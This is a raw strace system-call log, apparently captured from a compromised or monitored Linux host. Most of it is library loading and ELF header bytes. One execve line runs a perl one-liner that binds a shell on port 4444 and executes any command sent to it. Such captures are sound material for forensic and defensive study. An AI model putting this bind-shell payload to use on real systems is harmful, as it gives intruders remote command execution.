\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

5822  07:10:52.691168 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

5822  07:10:52.691185 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e27000

5822  07:10:52.691197 mmap2(0xb7e2e000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7e2e000

5822  07:10:52.691214 close(1)          = 0

5822  07:10:52.691226 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.691239 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

5822  07:10:52.691253 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

5822  07:10:52.691377 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

5822  07:10:52.691409 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e0f000

5822  07:10:52.691420 mmap2(0xb7e23000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7e23000

5822  07:10:52.691436 mmap2(0xb7e25000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e25000

5822  07:10:52.691450 close(1)          = 0

5822  07:10:52.691476 munmap(0xb7fb5000, 29913) = 0

5822  07:10:52.691493 open("/etc/ld.so.cache", O_RDONLY) = 1

5822  07:10:52.691509 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5822  07:10:52.691526 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fb5000

5822  07:10:52.691536 close(1)          = 0

5822  07:10:52.691546 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.691561 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

5822  07:10:52.691575 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5822  07:10:52.691664 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

5822  07:10:52.691682 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e05000

5822  07:10:52.691693 mmap2(0xb7e0d000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7e0d000

5822  07:10:52.691709 close(1)          = 0

5822  07:10:52.691721 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5822  07:10:52.691735 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

5822  07:10:52.691749 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

5822  07:10:52.691846 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

5822  07:10:52.691863 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7dfa000

5822  07:10:52.691875 mmap2(0xb7e03000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7e03000

5822  07:10:52.691904 close(1)          = 0

5822  07:10:52.691924 munmap(0xb7fb5000, 29913) = 0

5822  07:10:52.691939 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

5822  07:10:52.691953 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

5822  07:10:52.691964 _llseek(1, 0, [0], SEEK_CUR) = 0

5822  07:10:52.691975 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

5822  07:10:52.691991 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7fbc000

5822  07:10:52.692001 _llseek(1, 1624, [1624], SEEK_SET) = 0

5822  07:10:52.692016 munmap(0xb7fbc000, 1624) = 0

5822  07:10:52.692029 close(1)          = 0

5822  07:10:52.692057 getpgrp()         = 3831

5822  07:10:52.692067 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

5822  07:10:52.692081 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

5822  07:10:52.692097 brk(0x8101000)    = 0x8101000

5822  07:10:52.692127 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5822  07:10:52.692142 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5822  07:10:52.692156 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

5822  07:10:52.692192 brk(0x8102000)    = 0x8102000

5822  07:10:52.692217 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5822  07:10:52.692235 stat64("/sbin/AB", 0xbfeedd48) = -1 ENOENT (No such file or directory)

5822  07:10:52.692247 stat64("/bin/AB", 0xbfeedd48) = -1 ENOENT (No such file or directory)

5822  07:10:52.692258 stat64("/usr/sbin/AB", 0xbfeedd48) = -1 ENOENT (No such file or directory)

5822  07:10:52.692269 stat64("/usr/bin/AB", 0xbfeedd48) = -1 ENOENT (No such file or directory)

5822  07:10:52.692282 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5822  07:10:52.692296 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e306f8) = 5823

5823  07:10:52.692422 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5823  07:10:52.692439 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5823  07:10:52.692452 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5823  07:10:52.692463 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5823  07:10:52.692478 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5823  07:10:52.692494 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5823  07:10:52.692506 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5823  07:10:52.692560 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

5823  07:10:52.692574 --- SIGPIPE (Broken pipe) @ 0 (0) ---

5823  07:10:52.692639 exit_group(127)   = ?

4519  07:10:52.709127 waitpid(5822,  <unfinished ...>

5822  07:10:52.709246 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5822  07:10:52.729298 --- SIGCHLD (Child exited) @ 0 (0) ---

5822  07:10:52.729317 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 5823

5822  07:10:52.729336 waitpid(-1, 0xbfeed9c8, WNOHANG) = -1 ECHILD (No child processes)

5822  07:10:52.729347 sigreturn()       = ? (mask now [])

5822  07:10:52.729377 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5822  07:10:52.729394 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5822  07:10:52.729405 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

5822  07:10:52.729417 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

5822  07:10:52.729436 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5822  07:10:52.729448 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

5822  07:10:52.729485 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

5822  07:10:52.729506 stat64("/sbin/perl", 0xbfeedd78) = -1 ENOENT (No such file or directory)

5822  07:10:52.729519 stat64("/bin/perl", 0xbfeedd78) = -1 ENOENT (No such file or directory)

5822  07:10:52.729530 stat64("/usr/sbin/perl", 0xbfeedd78) = -1 ENOENT (No such file or directory)

5822  07:10:52.729542 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5822  07:10:52.729560 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

5822  07:10:52.729586 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

5822  07:10:52.729601 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7e306f8) = 5824

5824  07:10:52.729670 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

5824  07:10:52.729687 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

5824  07:10:52.729700 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

5824  07:10:52.729712 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

5824  07:10:52.729736 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

5824  07:10:52.729754 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

5824  07:10:52.729767 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

5824  07:10:52.729803 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

5824  07:10:52.729899 brk(0)            = 0x8153000

5824  07:10:52.729921 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5824  07:10:52.729937 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fcf000

5824  07:10:52.729953 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

5824  07:10:52.729970 open("/etc/ld.so.cache", O_RDONLY) = 1

5824  07:10:52.729983 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

5824  07:10:52.730000 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7fc7000

5824  07:10:52.730010 close(1)          = 0

5824  07:10:52.730021 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5824  07:10:52.730036 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

5824  07:10:52.730050 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

5824  07:10:52.730143 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

5824  07:10:52.730160 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7fc3000

5824  07:10:52.730172 mmap2(0xb7fc5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7fc5000

5824  07:10:52.730188 close(1)          = 0

5824  07:10:52.730200 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5824  07:10:52.730214 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

5824  07:10:52.730237 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

5824  07:10:52.730326 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

5824  07:10:52.730343 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f9e000

5824  07:10:52.730358 mmap2(0xb7fc1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7fc1000

5824  07:10:52.730374 close(1)          = 0

5824  07:10:52.730386 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5824  07:10:52.730400 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

5824  07:10:52.730414 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

5824  07:10:52.730500 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

5824  07:10:52.730517 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f9d000

5824  07:10:52.730529 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f85000

5824  07:10:52.730540 mmap2(0xb7f99000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7f99000

5824  07:10:52.730556 mmap2(0xb7f9b000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f9b000

5824  07:10:52.730569 close(1)          = 0

5824  07:10:52.730581 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5824  07:10:52.730594 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

5824  07:10:52.730608 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

5824  07:10:52.730696 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

5824  07:10:52.730714 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7e36000

5824  07:10:52.730743 mmap2(0xb7f7f000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7f7f000

5824  07:10:52.730761 mmap2(0xb7f82000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7f82000

5824  07:10:52.730774 close(1)          = 0

5824  07:10:52.730786 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

5824  07:10:52.730799 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

5824  07:10:52.730817 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 